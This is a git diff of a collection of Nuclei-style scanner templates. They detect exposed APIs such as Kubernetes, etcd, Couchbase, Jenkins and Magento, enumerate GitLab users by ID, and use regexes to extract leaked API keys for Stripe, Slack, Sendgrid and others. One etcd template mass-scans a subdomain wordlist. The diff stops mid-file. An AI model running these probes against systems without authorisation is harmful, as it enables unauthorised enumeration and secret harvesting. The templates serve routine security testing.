index 100% rename from poc/api/bems-api-lfi-711.yaml rename to poc/api/bems-api-lfi-712.yaml diff --git a/poc/api/burp-api-detect-810.yaml b/poc/api/burp-api-detect-810.yaml new file mode 100644 index 0000000000..e09396dbd2 --- /dev/null +++ b/poc/api/burp-api-detect-810.yaml @@ -0,0 +1,34 @@ +id: burp-rest-api-detect + +info: + name: Burp Rest API Server Running + author: joanbono + severity: info + reference: + - https://portswigger.net/burp/documentation/enterprise/api-reference + metadata: + max-request: 1 + tags: burp,tech + +http: + - method: GET + path: + - "{{BaseURL}}/v0.1/" + + matchers-condition: and + matchers: + - type: word + words: + - 'Burp API' + part: body + + - type: word + words: + - 'X-Burp-Version' + part: header + + - type: status + status: + - 200 + +# digest: 4a0a00473045022052b868b75ef5acca38021fc922afd6de009fc394c0ff24b726bc9c1a6938ce18022100e2e714ce631619d950c6e0c2fa132fbefcea5bf44ba1084d4aae98548f93dd7f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/burp-api-detect.yaml b/poc/api/burp-api-detect.yaml deleted file mode 100644 index d1c703aa98..0000000000 --- a/poc/api/burp-api-detect.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: burp-rest-api-detect - -info: - name: Burp Rest API Server Running - author: joanbono - severity: info - reference: - - https://portswigger.net/burp/documentation/enterprise/api-reference - tags: burp,tech - -requests: - - method: GET - path: - - "{{BaseURL}}/v0.1/" - - matchers-condition: and - matchers: - - type: word - words: - - 'Burp API' - part: body - - type: word - words: - - 'X-Burp-Version' - part: header - - type: status - status: - - 200 diff --git a/poc/api/couchbase-buckets-api.yaml b/poc/api/couchbase-buckets-api-1232.yaml similarity index 100% rename from poc/api/couchbase-buckets-api.yaml rename to poc/api/couchbase-buckets-api-1232.yaml diff --git a/poc/api/couchbase-buckets-api-1233.yaml b/poc/api/couchbase-buckets-api-1233.yaml new file mode 100644 index 0000000000..8f15853ecd --- /dev/null +++ b/poc/api/couchbase-buckets-api-1233.yaml @@ -0,0 +1,42 @@ +id: couchbase-buckets-api + +info: + name: Couchbase Buckets Unauthenticated REST API - Detect + author: geeknik + severity: medium + description: Couchbase Buckets REST API without authentication was detected. + reference: + - https://docs.couchbase.com/server/current/rest-api/rest-bucket-intro.html + - https://www.elastic.co/guide/en/beats/metricbeat/current/metricbeat-metricset-couchbase-bucket.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: exposure,couchbase + +http: + - method: GET + path: + - "{{BaseURL}}/pools/default/buckets" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '"couchbase":' + - '"bucket":' + - '"data":' + condition: and + + - type: word + part: header + words: + - 'application/json' + +# digest: 4a0a00473045022100e55dbcbb79adce61041fd1cac9a564f188b7e62a6d0f7c290482da1fb502bd7b022063a58d316d535472c2601e23b2f4b717d6899e978ee9c58c92603914303b2739:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/exposed-glances-api-7307.yaml b/poc/api/exposed-glances-api-7307.yaml index da9cf56b82..8c2bcf81af 100644 --- a/poc/api/exposed-glances-api-7307.yaml +++ b/poc/api/exposed-glances-api-7307.yaml @@ -4,18 +4,20 @@ info: author: princechaddha severity: low description: Glances is a cross-platform system monitoring tool written in Python. - reference: - - https://nicolargo.github.io/glances/ + reference: https://nicolargo.github.io/glances/ tags: glances,exposure + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - 'title">Glances' diff --git a/poc/api/exposed-glances-api-7308.yaml b/poc/api/exposed-glances-api-7308.yaml deleted file mode 100644 index e00fe91045..0000000000 --- a/poc/api/exposed-glances-api-7308.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: exposed-glances-api - -info: - name: Exposed Glances API - author: princechaddha - severity: low - description: Glances is a cross-platform system monitoring tool written in Python. - reference: - - https://nicolargo.github.io/glances/ - tags: glances,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'title">Glances' - - 'glances.config' - - '' - part: body - condition: and diff --git a/poc/api/exposed-glances-api-7309.yaml b/poc/api/exposed-glances-api-7309.yaml deleted file mode 100644 index 8c2bcf81af..0000000000 --- a/poc/api/exposed-glances-api-7309.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: exposed-glances-api -info: - name: Exposed Glances API - author: princechaddha - severity: low - description: Glances is a cross-platform system monitoring tool written in Python. - reference: https://nicolargo.github.io/glances/ - tags: glances,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'title">Glances' - - 'glances.config' - - '' - part: body - condition: and diff --git a/poc/api/fastapi-docs-7398.yaml b/poc/api/fastapi-docs-7398.yaml deleted file mode 100644 index e0925b7940..0000000000 --- a/poc/api/fastapi-docs-7398.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: fastapi-docs - -info: - name: FastAPI Docs - author: github.com/its0x08 - severity: info - tags: fastapi,tech,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/docs" - - "{{BaseURL}}/redoc" - - "{{BaseURL}}/openapi.json" - - matchers: - - type: word - words: - - "FastAPI - Swagger UI" - - "FastAPI - ReDoc" - - '{"title":"FastAPI"' - condition: or diff --git a/poc/api/fastapi-docs.yaml b/poc/api/fastapi-docs.yaml index 34695c9e3a..e0925b7940 100644 --- a/poc/api/fastapi-docs.yaml +++ b/poc/api/fastapi-docs.yaml @@ -1,19 +1,12 @@ id: fastapi-docs info: - name: FastAPI Docs Panel - Detect + name: FastAPI Docs author: github.com/its0x08 severity: info - description: FastAPI Docs panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 3 tags: fastapi,tech,panel -http: +requests: - method: GET path: - "{{BaseURL}}/docs" @@ -27,5 +20,3 @@ http: - "FastAPI - ReDoc" - '{"title":"FastAPI"' condition: or - -# digest: 4a0a00473045022055d1a9b3183514d1d090f0aa621d4b9615ba59a3920b7561934619e63f60635f022100c7f0725485e8317716755cbb9f512a33cc50dfad615a301babc56549d2a6a8a2:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/gitlab-api-user-enum-7668.yaml b/poc/api/gitlab-api-user-enum-7668.yaml new file mode 100644 index 0000000000..da88f8d2fa --- /dev/null +++ b/poc/api/gitlab-api-user-enum-7668.yaml @@ -0,0 +1,33 @@ +id: gitlab-api-user-enum +info: + author: Suman_Kar + name: GitLab - User Information Disclosure Via Open API + severity: medium + reference: https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 + tags: gitlab,enum,misconfig,disclosure +requests: + - raw: + - | + GET /api/v4/users/{{uid}} HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Referer: {{BaseURL}} + payloads: + uid: helpers/wordlists/numbers.txt + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + part: body + condition: and + regex: + - "username.*" + - "id.*" + - "name.*" + - type: word + part: header + words: + - "application/json" + - type: status + status: + - 200 diff --git a/poc/api/gitlab-api-user-enum-7669.yaml b/poc/api/gitlab-api-user-enum-7669.yaml index da88f8d2fa..4edf1734a5 100644 --- a/poc/api/gitlab-api-user-enum-7669.yaml +++ b/poc/api/gitlab-api-user-enum-7669.yaml @@ -1,10 +1,15 @@ id: gitlab-api-user-enum + info: - author: Suman_Kar name: GitLab - User Information Disclosure Via Open API + author: Suman_Kar severity: medium - reference: https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 + reference: + - https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 + metadata: + shodan-query: http.title:"GitLab" tags: gitlab,enum,misconfig,disclosure + requests: - raw: - | @@ -12,8 +17,10 @@ requests: Host: {{Hostname}} Accept: application/json, text/plain, */* Referer: {{BaseURL}} + payloads: uid: helpers/wordlists/numbers.txt + stop-at-first-match: true matchers-condition: and matchers: @@ -24,10 +31,12 @@ requests: - "username.*" - "id.*" - "name.*" + - type: word part: header words: - "application/json" + - type: status status: - 200 diff --git a/poc/api/gitlab-api-user-enum.yaml b/poc/api/gitlab-api-user-enum.yaml index 6d6aac772a..40bafaf2d9 100644 --- a/poc/api/gitlab-api-user-enum.yaml +++ b/poc/api/gitlab-api-user-enum.yaml @@ -1,5 +1,4 @@ id: gitlab-api-user-enum - info: name: GitLab - User Information Disclosure Via Open API author: Suman_Kar @@ -7,22 +6,18 @@ info: reference: - https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 metadata: - max-request: 100 shodan-query: http.title:"GitLab" tags: gitlab,enum,misconfig,disclosure - -http: +requests: - raw: - | GET /api/v4/users/{{uid}} HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/plain, */* Referer: {{BaseURL}} - payloads: uid: helpers/wordlists/numbers.txt stop-at-first-match: true - matchers-condition: and matchers: - type: regex @@ -32,14 +27,10 @@ http: - "username.*" - "id.*" - "name.*" - - type: word part: header words: - "application/json" - - type: status status: - 200 - -# digest: 4b0a00483046022100e91d88c0e5b8fc728356db398d1642b8928c8b06e2d15eb1b1d8aa7370e1ebe1022100f00de311f83fd9785f1655ac58104c405353183930d8524cc2802d7a98096df8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/google-api-7771.yaml b/poc/api/google-api-7771.yaml deleted file mode 100644 index c227c5263b..0000000000 --- a/poc/api/google-api-7771.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: google-api-key - -info: - name: Google API key - author: gaurang - severity: info - tags: token,file - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - "AIza[0-9A-Za-z\\-_]{35}" \ No newline at end of file diff --git a/poc/api/http-etcd-unauthenticated-api-data-leak-8056.yaml b/poc/api/http-etcd-unauthenticated-api-data-leak-8056.yaml deleted file mode 100644 index 1c523c0a06..0000000000 --- a/poc/api/http-etcd-unauthenticated-api-data-leak-8056.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: http-etcd-unauthenticated-api-data-leak -info: - name: etcd Unauthenticated HTTP API Leak - author: dhiyaneshDk - severity: high - reference: https://hackerone.com/reports/1088429 - tags: unauth -requests: - - method: GET - path: - - "{{BaseURL}}/v2/auth/roles" - matchers-condition: and - matchers: - - type: word - words: - - '"roles"' - - '"permissions"' - - '"role"' - - '"kv"' - condition: and - part: body - - type: status - status: - - 200 - - type: word - part: header - words: - - "text/plain" diff --git a/poc/api/http-etcd-unauthenticated-api-data-leak.yaml b/poc/api/http-etcd-unauthenticated-api-data-leak.yaml new file mode 100644 index 0000000000..ba35991570 --- /dev/null +++ b/poc/api/http-etcd-unauthenticated-api-data-leak.yaml @@ -0,0 +1,38 @@ +id: http-etcd-unauthenticated-api-data-leak + +info: + name: etcd Unauthenticated HTTP API Leak + author: dhiyaneshDk + severity: high + reference: https://hackerone.com/reports/1088429 + tags: unauth + +requests: + - payloads: + Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt + attack: sniper + threads: 100 + + raw: + - | + GET /v2/auth/roles HTTP/1.1 + Host: {{Subdomains}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept-Encoding: gzip, deflate + matchers-condition: and + matchers: + - type: word + words: + - '"roles"' + - '"permissions"' + - '"role"' + - '"kv"' + condition: and + part: body + - type: status + status: + - 200 + - type: word + part: header + words: + - "text/plain" diff --git a/poc/api/jenkins-api-panel-8261.yaml b/poc/api/jenkins-api-panel-8261.yaml index 0bafb05b2b..e99421b55c 100644 --- a/poc/api/jenkins-api-panel-8261.yaml +++ b/poc/api/jenkins-api-panel-8261.yaml @@ -1,19 +1,23 @@ id: jenkins-api-panel + info: name: Jenkins API Instance Detection Template author: righettod severity: info description: Try to detect the presence of a Jenkins API instance via the API default XML endpoint tags: panel,api,jenkins + requests: - method: GET path: - "{{BaseURL}}/api/xml" + matchers-condition: and matchers: - type: word words: - "hudson.model.Hudson" + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/api/jenkins-api-panel.yaml b/poc/api/jenkins-api-panel.yaml index e99421b55c..f6e14282df 100644 --- a/poc/api/jenkins-api-panel.yaml +++ b/poc/api/jenkins-api-panel.yaml @@ -1,13 +1,19 @@ id: jenkins-api-panel info: - name: Jenkins API Instance Detection Template + name: Jenkins API Panel - Detect author: righettod severity: info - description: Try to detect the presence of a Jenkins API instance via the API default XML endpoint + description: Jenkins API panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 tags: panel,api,jenkins -requests: +http: - method: GET path: - "{{BaseURL}}/api/xml" @@ -20,4 +26,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# digest: 490a0046304402200bf937e45af9c4c6baf0e7259310e0705554a377abea3512968d44d5e8f0bc0f02202036c56a49b779b010d00006020815cde81c0612326f89b6d51a21992cac063c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/kube-api-deployments-8503.yaml b/poc/api/kube-api-deployments-8503.yaml index ccf298abbc..e01bc80a9e 100644 --- a/poc/api/kube-api-deployments-8503.yaml +++ b/poc/api/kube-api-deployments-8503.yaml @@ -1,15 +1,12 @@ id: kube-api-deployments - info: name: Kube API Deployments author: sharath severity: info description: Scans for kube deployments - metadata: - max-request: 1 tags: tech,k8s,kubernetes,devops,kube -http: +requests: - method: GET path: - "{{BaseURL}}/apis/apps/v1/namespaces/default/deployments" @@ -25,6 +22,4 @@ http: words: - '"DeploymentList":' - '"items":' - condition: and - -# digest: 4a0a0047304502207d3243aa83d832915b5727b4da7f06dbf8dc0398bc8643ddec37226b0bcb05fc022100b7144eca7fd2f591936d5633a4298175851be34c3d748cbebab60a3b048b627d:922c64590222798bb761d5b6d8e72950 + condition: and \ No newline at end of file diff --git a/poc/api/kube-api-deployments.yaml b/poc/api/kube-api-deployments.yaml new file mode 100644 index 0000000000..41e2d34d4a --- /dev/null +++ b/poc/api/kube-api-deployments.yaml @@ -0,0 +1,22 @@ +id: kube-api-deployments +info: + name: Kube API Deployments + author: sharath + severity: info + description: Scans for kube deployments + tags: tech,k8s,kubernetes,devops,kube +requests: + - method: GET + path: + - "{{BaseURL}}/apis/apps/v1/namespaces/default/deployments" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - '"DeploymentList":' + - '"items":' + condition: and diff --git a/poc/api/kube-api-namespaces-8505.yaml b/poc/api/kube-api-namespaces-8505.yaml index 934bb7bcb6..083c018d9d 100644 --- a/poc/api/kube-api-namespaces-8505.yaml +++ b/poc/api/kube-api-namespaces-8505.yaml @@ -1,15 +1,12 @@ id: kube-api-namespaces - info: name: Kube API Namespaces author: sharath severity: info description: Scans for kube namespaces - metadata: - max-request: 1 tags: tech,k8s,kubernetes,devops,kube -http: +requests: - method: GET path: - "{{BaseURL}}/api/v1/namespaces" @@ -25,6 +22,4 @@ http: words: - '"NamespaceList":' - '"items":' - condition: and - -# digest: 4a0a00473045022063f688f881894ac393b696d0737d2878f4de4af5f596910eb3b8bf17686f8a97022100af751c175b370dd577b22c6fa201f6a8ceaf6bf88707ee2686612b42b45ae3ae:922c64590222798bb761d5b6d8e72950 + condition: and \ No newline at end of file diff --git a/poc/api/kube-api-namespaces-8506.yaml b/poc/api/kube-api-namespaces-8506.yaml index 8d0b0d8792..b4e820623c 100644 --- a/poc/api/kube-api-namespaces-8506.yaml +++ b/poc/api/kube-api-namespaces-8506.yaml @@ -1,26 +1,22 @@ id: kube-api-namespaces - info: name: Kube API Namespaces author: sharath severity: info description: Scans for kube namespaces tags: tech,k8s,kubernetes,devops,kube - requests: - method: GET path: - "{{BaseURL}}/api/v1/namespaces" - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: body words: - '"NamespaceList":' - '"items":' - condition: and \ No newline at end of file + condition: and diff --git a/poc/api/kube-api-nodes-8508.yaml b/poc/api/kube-api-nodes-8508.yaml index 8e44c71d24..83d3fc8b2f 100644 --- a/poc/api/kube-api-nodes-8508.yaml +++ b/poc/api/kube-api-nodes-8508.yaml @@ -1,22 +1,33 @@ id: kube-api-nodes + info: name: Kube API Nodes - author: sharath + author: sharath,ritikchaddha severity: info description: Scans for kube nodes + metadata: + max-request: 1 tags: tech,k8s,kubernetes,devops,kube -requests: + +http: - method: GET path: - "{{BaseURL}}/api/v1/nodes" - matchers-condition: and + + matchers-condition: or matchers: - - type: status - status: - - 200 - type: word part: body words: - '"NodeList":' - '"items":' condition: and + + - type: word + part: body + words: + - '"containerRuntimeVersion"' + - '"kubeletVersion": "v' + condition: and + +# digest: 490a0046304402205f312dec39e7712ec578c13702c841788aae4b5665e4767aa8b40c740a8d5f5e022016d0c0791ea08625719167931f1a39a4f622cb0605c4f8511e64a11f9d08548c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/kube-api-services-8514.yaml b/poc/api/kube-api-services-8514.yaml new file mode 100644 index 0000000000..c037f8f678 --- /dev/null +++ b/poc/api/kube-api-services-8514.yaml @@ -0,0 +1,22 @@ +id: kube-api-services +info: + name: Kube API Services + author: sharath + severity: info + description: Scans for kube services + tags: tech,k8s,kubernetes,devops,kube +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/namespaces/default/services" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - '"ServiceList":' + - '"items":' + condition: and diff --git a/poc/api/kube-api-services.yaml b/poc/api/kube-api-services.yaml deleted file mode 100644 index 0fd4dad91f..0000000000 --- a/poc/api/kube-api-services.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: kube-api-services - -info: - name: Kube API Services - author: sharath - severity: info - description: Scans for kube services - tags: tech,k8s,kubernetes,devops,kube - -requests: - - method: GET - path: - - "{{BaseURL}}/api/v1/namespaces/default/services" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - '"ServiceList":' - - '"items":' - condition: and \ No newline at end of file diff --git a/poc/api/magento-2-exposed-api-8687.yaml b/poc/api/magento-2-exposed-api-8687.yaml index 6895f1f6dc..c5d33f7ec1 100644 --- a/poc/api/magento-2-exposed-api-8687.yaml +++ b/poc/api/magento-2-exposed-api-8687.yaml @@ -1,24 +1,17 @@ id: magento-2-exposed-api - info: name: Exposed Magento 2 API author: TechbrunchFR severity: info description: The API in Magento 2 can be accessed by the world without providing credentials. Through the API information like storefront, (hidden) products including prices are exposed. - reference: - - https://support.hypernode.com/en/ecommerce/magento-2/how-to-protect-the-magento-2-api - metadata: - max-request: 3 - shodan-query: http.component:"Magento" + reference: https://support.hypernode.com/en/ecommerce/magento-2/how-to-protect-the-magento-2-api tags: magento - -http: +requests: - method: GET path: - '{{BaseURL}}/rest/V1/products' - '{{BaseURL}}/rest/V1/store/storeConfigs' - '{{BaseURL}}/rest/V1/store/storeViews' - matchers-condition: or matchers: - type: dsl @@ -26,23 +19,19 @@ http: - 'contains(body, "searchCriteria")' - 'contains(body, "parameters")' - 'contains(body, "message")' - - 'contains(tolower(header), "application/json")' + - 'contains(tolower(all_headers), "application/json")' condition: and - - type: dsl dsl: - 'contains(body, "secure_base_link_url")' - 'contains(body, "timezone")' - - 'contains(tolower(header), "application/json")' + - 'contains(tolower(all_headers), "application/json")' - 'status_code == 200' condition: and - - type: dsl dsl: - 'contains(body, "name")' - 'contains(body, "website_id")' - - 'contains(tolower(header), "application/json")' + - 'contains(tolower(all_headers), "application/json")' - 'status_code == 200' condition: and - -# digest: 490a0046304402205108a66aabb3bfd2cfa26f2fd4816a1afa5f3c52dd43f5ea029a1308d8079204022045463c3b751fd59511882d4eb2e2f046f4f31c5f5c3fcc52daac8d8adcb2214d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/magento-2-exposed-api-8688.yaml b/poc/api/magento-2-exposed-api-8688.yaml index ddf8e7633a..7b79814f12 100644 --- a/poc/api/magento-2-exposed-api-8688.yaml +++ b/poc/api/magento-2-exposed-api-8688.yaml @@ -1,5 +1,4 @@ id: magento-2-exposed-api - info: name: Exposed Magento 2 API author: TechbrunchFR @@ -7,17 +6,13 @@ info: description: The API in Magento 2 can be accessed by the world without providing credentials. Through the API information like storefront, (hidden) products including prices are exposed. reference: - https://support.hypernode.com/en/ecommerce/magento-2/how-to-protect-the-magento-2-api - metadata: - shodan-query: http.component:"Magento" tags: magento - requests: - method: GET path: - '{{BaseURL}}/rest/V1/products' - '{{BaseURL}}/rest/V1/store/storeConfigs' - '{{BaseURL}}/rest/V1/store/storeViews' - matchers-condition: or matchers: - type: dsl @@ -27,7 +22,6 @@ requests: - 'contains(body, "message")' - 'contains(tolower(all_headers), "application/json")' condition: and - - type: dsl dsl: - 'contains(body, "secure_base_link_url")' @@ -35,11 +29,10 @@ requests: - 'contains(tolower(all_headers), "application/json")' - 'status_code == 200' condition: and - - type: dsl dsl: - 'contains(body, "name")' - 'contains(body, "website_id")' - 'contains(tolower(all_headers), "application/json")' - 'status_code == 200' - condition: and \ No newline at end of file + condition: and diff --git a/poc/api/mailchimp-api-11854.yaml b/poc/api/mailchimp-api(1).yaml similarity index 100% rename from poc/api/mailchimp-api-11854.yaml rename to poc/api/mailchimp-api(1).yaml diff --git a/poc/api/mailchimp-api.yaml b/poc/api/mailchimp-api.yaml index 09657f0502..533e037281 100644 --- a/poc/api/mailchimp-api.yaml +++ b/poc/api/mailchimp-api.yaml @@ -1,5 +1,4 @@ id: mailchimp-api-key - info: name: Mailchimp API Key author: gaurang @@ -8,10 +7,7 @@ info: file: - extensions: - all - extractors: - type: regex regex: - "[0-9a-f]{32}-us[0-9]{1,2}" - -# digest: 4a0a00473045022044dc0414ef16f4cc2e54af8fb429d909233c3da5b9930d856d2d3a07caf5c184022100b714c99dcc1a53d01e2e20070ed6b094b841d629c949e98cef1ee1b382b8b1a4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/mailgun-api.yaml b/poc/api/mailgun-api.yaml index ec96ecfed8..0c3db4d856 100644 --- a/poc/api/mailgun-api.yaml +++ b/poc/api/mailgun-api.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file,mailgun - file: - extensions: - all @@ -14,3 +13,5 @@ file: - type: regex regex: - "key-[0-9a-zA-Z]{32}" + +# digest: 4a0a00473045022100d1400353de6af71a602908816db1e3f13148cd04a694f42af9b6b25a1099d8b402201aec613457a1a345d88d8c3151b6bc3256571fa527c5fc0819794ad3d5f5640d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/pictatic-api-key.yaml b/poc/api/pictatic-api-key.yaml index 41ea01a136..ec20f07569 100644 --- a/poc/api/pictatic-api-key.yaml +++ b/poc/api/pictatic-api-key.yaml @@ -5,6 +5,7 @@ info: author: gaurang severity: high tags: token,file + file: - extensions: - all @@ -12,6 +13,4 @@ file: extractors: - type: regex regex: - - "sk_live_[0-9a-z]{32}" - -# digest: 4a0a00473045022100d571fd7454b599f0a3ae00922d80dfadb02ac853b00328f07a4f5bd41a63d879022001109992bb9b44fcacba43a0f3f72b19a6ad1b5f7d3e4c00d20e80cd1ec0e4d8:922c64590222798bb761d5b6d8e72950 + - "sk_live_[0-9a-z]{32}" \ No newline at end of file diff --git a/poc/api/sendgrid-api-11859.yaml b/poc/api/sendgrid-api-11859.yaml index 000c4516ea..a67fb048a4 100644 --- a/poc/api/sendgrid-api-11859.yaml +++ b/poc/api/sendgrid-api-11859.yaml @@ -1,15 +1,12 @@ id: sendgrid-api-key-file - info: name: Sendgrid API Key author: gaurang severity: high tags: token,file,sendgrid - file: - extensions: - all - extractors: - type: regex regex: diff --git a/poc/api/sendgrid-api-key-10140.yaml b/poc/api/sendgrid-api-key-10142.yaml similarity index 100% rename from poc/api/sendgrid-api-key-10140.yaml rename to poc/api/sendgrid-api-key-10142.yaml diff --git a/poc/api/sendgrid-api-key.yaml b/poc/api/sendgrid-api-key.yaml new file mode 100644 index 0000000000..88f920b11b --- /dev/null +++ b/poc/api/sendgrid-api-key.yaml @@ -0,0 +1,15 @@ +id: sendgrid-api-key +info: + name: Sendgrid API Key Disclosure + author: Ice3man + severity: info + tags: exposure,token +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - 'SG\.[a-zA-Z0-9-_]{22}\.[a-zA-Z0-9_-]{43}' diff --git a/poc/api/slack-api(1).yaml b/poc/api/slack-api(1).yaml new file mode 100644 index 0000000000..ea761c24d4 --- /dev/null +++ b/poc/api/slack-api(1).yaml @@ -0,0 +1,16 @@ +id: slack-api + +info: + name: Slack API Key + author: gaurang + severity: high + tags: token,file,slack + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "xox[baprs]-([0-9a-zA-Z]{10,48})?" diff --git a/poc/api/slack-api-11864.yaml b/poc/api/slack-api-11864.yaml deleted file mode 100644 index 51bef1c14c..0000000000 --- a/poc/api/slack-api-11864.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: slack-api -info: - name: Slack API Key - author: gaurang - severity: high - tags: token,file,slack -file: - - extensions: - - all - extractors: - - type: regex - regex: - - "xox[baprs]-([0-9a-zA-Z]{10,48})?" diff --git a/poc/api/slack-api.yaml b/poc/api/slack-api.yaml index 6f17ee55d5..51bef1c14c 100644 --- a/poc/api/slack-api.yaml +++ b/poc/api/slack-api.yaml @@ -1,5 +1,4 @@ id: slack-api - info: name: Slack API Key author: gaurang @@ -8,10 +7,7 @@ info: file: - extensions: - all - extractors: - type: regex regex: - "xox[baprs]-([0-9a-zA-Z]{10,48})?" - -# digest: 4b0a00483046022100ba3776e008af0a4e7848a73adf72eb7a16913a260d81182aeac50bc9d167c3d3022100d24a73474fbec04e1368b575900583a20922f4cc0fc702c636f53651fc17f939:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/strapi-cms-detect-10539.yaml b/poc/api/strapi-cms-detect-10539.yaml index 5266dc58e2..530e120e7e 100644 --- a/poc/api/strapi-cms-detect-10539.yaml +++ b/poc/api/strapi-cms-detect-10539.yaml @@ -4,7 +4,8 @@ info: author: cyllective,daffainfo,idealphase severity: info description: Open source Node.js Headless CMS to easily build customisable APIs - reference: https://github.com/strapi/strapi + reference: + - https://github.com/strapi/strapi tags: tech,strapi,cms requests: - method: GET diff --git a/poc/api/strapi-cms-detect.yaml b/poc/api/strapi-cms-detect.yaml deleted file mode 100644 index 530e120e7e..0000000000 --- a/poc/api/strapi-cms-detect.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: strapi-cms-detect -info: - name: Strapi CMS detect - author: cyllective,daffainfo,idealphase - severity: info - description: Open source Node.js Headless CMS to easily build customisable APIs - reference: - - https://github.com/strapi/strapi - tags: tech,strapi,cms -requests: - - method: GET - path: - - "{{BaseURL}}/admin/init" - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"data"' - - '"uuid"' - - '"hasAdmin"' - condition: and - - type: status - status: - - 200 - extractors: - - type: regex - part: body - group: 1 - regex: - - '"strapiVersion":"([0-9.]+)"' diff --git a/poc/api/strapi-page-10546.yaml b/poc/api/strapi-page-10546.yaml new file mode 100644 index 0000000000..edf6a044e2 --- /dev/null +++ b/poc/api/strapi-page-10546.yaml @@ -0,0 +1,20 @@ +id: strapi-page + +info: + name: Strapi Page + author: dhiyaneshDk + severity: info + reference: + - https://www.shodan.io/search?query=http.title%3A%22Welcome+to+your+Strapi+app%22 + tags: api,strapi + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - 'Welcome to your Strapi app' + condition: and diff --git a/poc/api/strapi-page-10544.yaml b/poc/api/strapi-page.yaml similarity index 100% rename from poc/api/strapi-page-10544.yaml rename to poc/api/strapi-page.yaml diff --git a/poc/api/stripe-api-key(1).yaml b/poc/api/stripe-api-key(1).yaml deleted file mode 100644 index d65411c71f..0000000000 --- a/poc/api/stripe-api-key(1).yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: stripe-api-key - -info: - name: Stripe API Key - author: gaurang - severity: high - tags: token,file,stripe - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - "(?i)stripe(.{0,20})?[sr]k_live_[0-9a-zA-Z]{24}" diff --git a/poc/api/stripe-api-key-11869.yaml b/poc/api/stripe-api-key-11869.yaml new file mode 100644 index 0000000000..5624af050d --- /dev/null +++ b/poc/api/stripe-api-key-11869.yaml @@ -0,0 +1,13 @@ +id: stripe-api-key +info: + name: Stripe API Key + author: gaurang + severity: high + tags: token,file,stripe +file: + - extensions: + - all + extractors: + - type: regex + regex: + - "(?i)stripe(.{0,20})?[sr]k_live_[0-9a-zA-Z]{24}" diff --git a/poc/api/stripe-api-key.yaml b/poc/api/stripe-api-key.yaml index a5ea66caf7..d65411c71f 100644 --- a/poc/api/stripe-api-key.yaml +++ b/poc/api/stripe-api-key.yaml @@ -5,6 +5,7 @@ info: author: gaurang severity: high tags: token,file,stripe + file: - extensions: - all @@ -13,5 +14,3 @@ file: - type: regex regex: - "(?i)stripe(.{0,20})?[sr]k_live_[0-9a-zA-Z]{24}" - -# digest: 4b0a00483046022100f0e284415d4e8014de7c3e8cfdf980c900fd56a840ea195cffecec856505187302210097d3c6810ed01c45e33ddcd46998419fda6972b412edda34ce8ff9ed4fa6384b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/swagger-api-10591.yaml b/poc/api/swagger-api-10591.yaml index b7d499e8a8..2662c02a5d 100644 --- a/poc/api/swagger-api-10591.yaml +++ b/poc/api/swagger-api-10591.yaml @@ -1,11 +1,9 @@ id: swagger-api - info: name: Public Swagger API author: pdteam severity: info tags: 